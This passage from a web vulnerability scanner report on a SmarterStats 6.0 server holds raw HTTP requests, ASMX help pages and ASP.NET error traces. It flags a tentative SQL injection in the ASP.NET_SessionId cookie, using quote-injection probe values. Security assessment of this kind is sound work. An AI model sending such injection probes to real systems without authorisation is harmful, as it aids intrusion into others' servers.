System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=AddSiteWithFTP2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4%2527%2527; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:35:32 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 25993
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>AddSiteWithFTP2</h2>
<p class="intro">Adds a site with ftp logs to the MRS.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/AddSiteWithFTP2' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soUserName:</td>
<td><input class="frmInput" type="text" size="50" name="soUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soPassword:</td>
<td><input class="frmInput" type="text" size="50" name="soPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soFirstName:</td>
<td><input class="frmInput" type="text" size="50" name="soFirstName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soLastName:</td>
<td><input class="frmInput" type="text" size="50" name="soLastName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ServerID:</td>
<td><input class="frmInput" type="text" size="50" name="ServerID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteID:</td>
<td><input class="frmInput" type="text" size="50" name="SiteID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DomainName:</td>
<td><input class="frmInput" type="text" size="50" name="DomainName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogFormat:</td>
<td><input class="frmInput" type="text" size="50" name="LogFormat"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogWildcard:</td>
<td><input class="frmInput" type="text" size="50" name="LogWildcard"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogDaysBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="LogDaysBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogDirectory:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogDirectory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogMonthsBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogMonthsBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPath:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPath"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPathURL:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPathURL"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">TimeZoneIndex:</td>
<td><input class="frmInput" type="text" size="50" name="TimeZoneIndex"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Directory:</td>
<td><input class="frmInput" type="text" size="50" name="Directory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyType:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyType"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyAddress:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyAddress"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyPort:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyPort"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyUserName:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyPassword:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Server:</td>
<td><input class="frmInput" type="text" size="50" name="Server"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Port:</td>
<td><input class="frmInput" type="text" size="50" name="Port"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Username:</td>
<td><input class="frmInput" type="text" size="50" name="Username"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Password:</td>
<td><input class="frmInput" type="text" size="50" name="Password"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">IntervalHours:</td>
<td><input class="frmInput" type="text" size="50" name="IntervalHours"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/AddSiteWithFTP2"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSiteWithFTP2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;Directory&gt;<font class=value>string</font>&lt;/Directory&gt;
&lt;ProxyType&gt;<font class=value>string</font>&lt;/ProxyType&gt;
&lt;ProxyAddress&gt;<font class=value>string</font>&lt;/ProxyAddress&gt;
&lt;ProxyPort&gt;<font class=value>int</font>&lt;/ProxyPort&gt;
&lt;ProxyUserName&gt;<font class=value>string</font>&lt;/ProxyUserName&gt;
&lt;ProxyPassword&gt;<font class=value>string</font>&lt;/ProxyPassword&gt;
&lt;Server&gt;<font class=value>string</font>&lt;/Server&gt;
&lt;Port&gt;<font class=value>int</font>&lt;/Port&gt;
&lt;Username&gt;<font class=value>string</font>&lt;/Username&gt;
&lt;Password&gt;<font class=value>string</font>&lt;/Password&gt;
&lt;IntervalHours&gt;<font class=value>int</font>&lt;/IntervalHours&gt;
&lt;/AddSiteWithFTP2&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSiteWithFTP2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSiteWithFTP2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSiteWithFTP2Result&gt;
&lt;/AddSiteWithFTP2Response&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSiteWithFTP2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;Directory&gt;<font class=value>string</font>&lt;/Directory&gt;
&lt;ProxyType&gt;<font class=value>string</font>&lt;/ProxyType&gt;
&lt;ProxyAddress&gt;<font class=value>string</font>&lt;/ProxyAddress&gt;
&lt;ProxyPort&gt;<font class=value>int</font>&lt;/ProxyPort&gt;
&lt;ProxyUserName&gt;<font class=value>string</font>&lt;/ProxyUserName&gt;
&lt;ProxyPassword&gt;<font class=value>string</font>&lt;/ProxyPassword&gt;
&lt;Server&gt;<font class=value>string</font>&lt;/Server&gt;
&lt;Port&gt;<font class=value>int</font>&lt;/Port&gt;
&lt;Username&gt;<font class=value>string</font>&lt;/Username&gt;
&lt;Password&gt;<font class=value>string</font>&lt;/Password&gt;
&lt;IntervalHours&gt;<font class=value>int</font>&lt;/IntervalHours&gt;
&lt;/AddSiteWithFTP2&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSiteWithFTP2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSiteWithFTP2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSiteWithFTP2Result&gt;
&lt;/AddSiteWithFTP2Response&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/AddSiteWithFTP2?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneIndex</font>=<font class=value>string</font>&amp;<font class=key>Directory</font>=<font class=value>string</font>&amp;<font class=key>ProxyType</font>=<font class=value>string</font>&amp;<font class=key>ProxyAddress</font>=<font class=value>string</font>&amp;<font class=key>ProxyPort</font>=<font class=value>string</font>&amp;<font class=key>ProxyUserName</font>=<font class=value>string</font>&amp;<font class=key>ProxyPassword</font>=<font class=value>string</font>&amp;<font class=key>Server</font>=<font class=value>string</font>&amp;<font class=key>Port</font>=<font class=value>string</font>&amp;<font class=key>Username</font>=<font class=value>string</font>&amp;<font class=key>Password</font>=<font class=value>string</font>&amp;<font 
class=key>IntervalHours</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/AddSiteWithFTP2 HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneIndex</font>=<font class=value>string</font>&amp;<font class=key>Directory</font>=<font class=value>string</font>&amp;<font class=key>ProxyType</font>=<font class=value>string</font>&amp;<font class=key>ProxyAddress</font>=<font class=value>string</font>&amp;<font class=key>ProxyPort</font>=<font class=value>string</font>&amp;<font class=key>ProxyUserName</font>=<font class=value>string</font>&amp;<font class=key>ProxyPassword</font>=<font class=value>string</font>&amp;<font class=key>Server</font>=<font class=value>string</font>&amp;<font class=key>Port</font>=<font class=value>string</font>&amp;<font class=key>Username</font>=<font class=value>string</font>&amp;<font class=key>Password</font>=<font class=value>string</font>&amp;<font class=key>IntervalHours</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

</span>









</body>
</html>

2.7. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [ASP.NET_SessionId cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The ASP.NET_SessionId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ASP.NET_SessionId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /Services/SiteAdmin.asmx?op=GetSiteStatus HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4'; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:36:45 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
